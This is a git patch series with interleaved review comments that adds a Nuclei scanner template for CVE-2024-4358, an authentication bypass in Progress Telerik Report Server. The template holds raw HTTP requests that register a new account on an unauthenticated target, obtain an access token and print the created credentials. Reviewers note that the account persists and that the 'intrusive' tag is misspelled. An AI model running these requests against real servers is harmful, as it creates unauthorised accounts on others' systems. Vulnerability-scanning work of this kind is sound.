From 5addd1de0e3b4390ccdb316ff6536c8a84a48e1e Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Mon, 3 Jun 2024 16:10:34 +0530
Subject: [PATCH 1/4] Create CVE-2024-4358.yaml

---
 http/cves/2024/CVE-2024-4358.yaml | 87 +++++++++++++++++++++++++++++++
 1 file changed, 87 insertions(+)
 create mode 100644 http/cves/2024/CVE-2024-4358.yaml

diff --git a/http/cves/2024/CVE-2024-4358.yaml b/http/cves/2024/CVE-2024-4358.yaml
new file mode 100644
index 0000000000..3e15ec1b3f
--- /dev/null
+++ b/http/cves/2024/CVE-2024-4358.yaml
@@ -0,0 +1,87 @@ +id: CVE-2024-4358 + +info: + name: Telerik Report Server - Authentication Bypass + author: DhiyaneshDK + severity: critical + description: | + In Progress Telerik Report Server, version 2024 Q1 (10.0.24.305) or earlier, on IIS, an unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability. + reference: + - https://summoning.team/blog/progress-report-server-rce-cve-2024-4358-cve-2024-1800/ + - https://github.com/sinsinology/CVE-2024-4358 + metadata: + shodan-query: "Log in | Telerik Report Server" + tags: cve,cve2024,telerik,progress,auth-bypass + +variables: + user: "{{rand_base(6)}}" + pass: "{{rand_base(8)}}" + email: "{{randstr}}@{{rand_base(5)}}.com" + firstname: "{{rand_base(5)}}" + lastname: "{{rand_base(5)}}" + report: "{{to_lower(rand_text_alpha(8))}}" + + content: {{}} ##To Be Added + +http: + - raw: + - | + POST /Startup/Register HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + Username={{user}}&Password={{pass}}&ConfirmPassword={{pass}}&Email={{email}}&FirstName={{firstname}}&LastName={{lastname}} + + - | + POST /Token HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + grant_type=password&username={{user}}&password={{pass}} + + - | + POST /api/reportserver/report HTTP/1.1 + Host: {{Hostname}} + Authorization: Bearer {{token}} + Content-Type: application/json + + {"reportName": "{{report}}", "categoryName": "Samples", "description": null, "reportContent": "{{content}}", "extension": ".trdp"} + + - | + POST /api/reports/clients HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"timeStamp": null} + + - | + POST /api/reports/clients/{{clientid}}/parameters HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"report": "NAME/Samples/{{report}}/", "parameterValues": {}} + + matchers: + - type: dsl + dsl: + - 'contains(content_type_2, "application/json")' + - 
'contains(body_2, "access_token") && contains(body_4, "clientId") && contains(body_5, "message")' + - 'status_code_2 == 200' + condition: and + + extractors: + - type: regex + name: token + part: body_2 + group: 1 + regex: + - '"access_token":"([A-Z0-9a-z_-]+)"' + internal: true + + - type: regex + name: clientid + part: body_4 + group: 1 + regex: + - '"clientId":"([a-z0-9]+)"' + internal: true From a2e926b9542274a3cf43c98579a06a3312b7145e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 3 Jun 2024 16:13:57 +0530 Subject: [PATCH 2/4] fix lint error --- http/cves/2024/CVE-2024-4358.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-4358.yaml b/http/cves/2024/CVE-2024-4358.yaml index 3e15ec1b3f..3919c7c39f 100644 --- a/http/cves/2024/CVE-2024-4358.yaml +++ b/http/cves/2024/CVE-2024-4358.yaml @@ -20,8 +20,7 @@ variables: firstname: "{{rand_base(5)}}" lastname: "{{rand_base(5)}}" report: "{{to_lower(rand_text_alpha(8))}}" - - content: {{}} ##To Be Added + content: "{{}}" ##To Be Added http: - raw: From a365149f938ed0d5e167a1d5a8cfd67da6a5c913 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 3 Jun 2024 17:51:14 +0530 Subject: [PATCH 3/4] minor update --- http/cves/2024/CVE-2024-4358.yaml | 46 ++++++++----------------------- 1 file changed, 12 insertions(+), 34 deletions(-) diff --git a/http/cves/2024/CVE-2024-4358.yaml b/http/cves/2024/CVE-2024-4358.yaml index 3919c7c39f..32f7e2d3b0 100644 --- a/http/cves/2024/CVE-2024-4358.yaml +++ b/http/cves/2024/CVE-2024-4358.yaml 
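Review bot: The first raw request, `POST /Startup/Register`, registers a real account on the target with the random `user`/`pass` values and the second request then logs in with it, but nothing in the template removes that account or tells the operator that it persists; the same holds for the two-request chain and the dsl extractor that PATCH 3 of this series introduces, so this is raised once here. Add a comment above `http:` such as `# The Register request creates a persistent account on the target; it is not cleaned up and must be removed manually afterwards.` In this version the generated credentials are only used by `internal: true` extractors and are never surfaced, so the operator has no way to identify which account to remove; PATCH 3's dsl extractor fixes that, and the comment should say that is what the output is for.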
@@ -1,16 +1,21 @@ id: CVE-2024-4358 info: - name: Telerik Report Server - Authentication Bypass + name: Progress Telerik Report Server - Authentication Bypass author: DhiyaneshDK severity: critical description: | In Progress Telerik Report Server, version 2024 Q1 (10.0.24.305) or earlier, on IIS, an unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability. + impact: An unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability. + remediation: Updating to Report Server 2024 Q2 (10.1.24.514) or later. reference: - https://summoning.team/blog/progress-report-server-rce-cve-2024-4358-cve-2024-1800/ - https://github.com/sinsinology/CVE-2024-4358 + - https://docs.telerik.com/report-server/knowledge-base/registration-auth-bypass-cve-2024-4358 metadata: - shodan-query: "Log in | Telerik Report Server" + shodan-query: title:"Log in | Telerik Report Server" + verified: true + max-request: 2 tags: cve,cve2024,telerik,progress,auth-bypass variables: @@ -19,8 +24,6 @@ variables: email: "{{randstr}}@{{rand_base(5)}}.com" firstname: "{{rand_base(5)}}" lastname: "{{rand_base(5)}}" - report: "{{to_lower(rand_text_alpha(8))}}" - content: "{{}}" ##To Be Added http: - raw: 
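Review bot: The new `remediation` line is a sentence fragment, `remediation: Updating to Report Server 2024 Q2 (10.1.24.514) or later.`; write it as an instruction, `remediation: Update to Report Server 2024 Q2 (10.1.24.514) or later.` The added `impact` line repeats the second half of `description` almost verbatim, so the two fields carry no distinct information; keep the affected versions and precondition in `description` and let `impact` state only the consequence.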
@@ -38,33 +41,11 @@ http: grant_type=password&username={{user}}&password={{pass}} - - | - POST /api/reportserver/report HTTP/1.1 - Host: {{Hostname}} - Authorization: Bearer {{token}} - Content-Type: application/json - - {"reportName": "{{report}}", "categoryName": "Samples", "description": null, "reportContent": "{{content}}", "extension": ".trdp"} - - - | - POST /api/reports/clients HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - - {"timeStamp": null} - - - | - POST /api/reports/clients/{{clientid}}/parameters HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - - {"report": "NAME/Samples/{{report}}/", "parameterValues": {}} - matchers: - type: dsl dsl: - 'contains(content_type_2, "application/json")' - - 'contains(body_2, "access_token") && contains(body_4, "clientId") && contains(body_5, "message")' + - 'contains_all(body_2, "access_token", "userName", "token_type")' - 'status_code_2 == 200' condition: and @@ -77,10 +58,7 @@ http: - '"access_token":"([A-Z0-9a-z_-]+)"' internal: true - - type: regex - name: clientid - part: body_4 - group: 1 - regex: - - '"clientId":"([a-z0-9]+)"' - internal: true + - type: dsl + dsl: + - '"Username: "+ user' + - '"Password: "+ pass' From c90632de186a2015707f3186ecc4482f00887da0 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 4 Jun 2024 14:43:34 +0530 Subject: [PATCH 4/4] add intrusive tag --- http/cves/2024/CVE-2024-4358.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-4358.yaml b/http/cves/2024/CVE-2024-4358.yaml index 32f7e2d3b0..b2e32509c0 100644 --- a/http/cves/2024/CVE-2024-4358.yaml +++ b/http/cves/2024/CVE-2024-4358.yaml @@ -16,7 +16,7 @@ info: shodan-query: title:"Log in | Telerik Report Server" verified: true max-request: 2 - tags: cve,cve2024,telerik,progress,auth-bypass + tags: cve,cve2024,telerik,progress,auth-bypass,instrusive variables: user: "{{rand_base(6)}}"
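Review bot: The new dsl extractor expressions in the `@@ -77,10 +58,7 @@` hunk put the `+` flush against the closing quote, `'"Username: "+ user'` and `'"Password: "+ pass'`; spacing them as `'"Username: " + user'` and `'"Password: " + pass'` reads consistently with the matcher expressions in the same file, which space their operators (`status_code_2 == 200`).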
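Review bot: The tag added in PATCH 4 is misspelled: `tags: cve,cve2024,telerik,progress,auth-bypass,instrusive` should read `tags: cve,cve2024,telerik,progress,auth-bypass,intrusive`. Tag filtering matches the string literally, so with the typo a run that excludes `intrusive` templates would still execute this one, which defeats the purpose of the commit given that its first request creates an account on the target. The subject line says `add intrusive tag`, so this looks like a plain typo rather than a deliberate value.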